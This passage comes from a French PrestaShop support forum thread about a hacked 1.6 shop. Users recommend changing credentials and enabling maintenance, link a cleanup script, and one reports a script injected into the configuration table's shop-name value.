ou ces arriver comme ca d'un coup ? ( changer deja tous vos acces , ftp , bdd ,email ......... )

il serais peut être judicieux , de vous mettre en maintenance ! pendant la résolution du problème , et même upgrade votre site pour etre a jour car ps 1.6 ..........

Edited Saturday at 06:24 PM by kis2a (see edit history)

kis2a · Saturday at 06:25 PM

3 hours ago, Eolia said:

https://shop.devcustom.net/fr/content/16-nettoyage-hack

celui ci marche sur toute version prestashop ? ou limiter a x version ?

Mediacom87 · 2025-01-05T11:53:43Z

Il y a 17 heures, kis2a a dit :

celui ci marche sur toute version prestashop ? ou limiter a x version ?

C'est indiqué :

Citation

- Script compatible toutes versions Presta (les versions supérieures à 1.6 ne sont plus contrôlées en intégrité)

jayb174 · 2025-01-05T22:24:09Z

This has happened to me twice in the last 5 days. I found that the script was added to the ps_configuration table and changed the value of PS_SHOP_NAME. Have you found any causes or solutions?

Mediacom87 · 2025-01-05T22:49:19Z

il y a 24 minutes, jayb174 a dit :

Cela m'est arrivé deux fois au cours des cinq derniers jours. J'ai découvert que le script avait été ajouté à la table ps_configuration et qu'il avait modifié la valeur de PS_SHOP_NAME. Avez-vous trouvé des causes ou des solutions ?

Merci de respecter la langue du topic et de la section du forum.

Piratage en cours sur mon site sous prestashop 1.6 ? Besoin d'aide svp

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Create an account or sign in to comment

Create an account

Sign in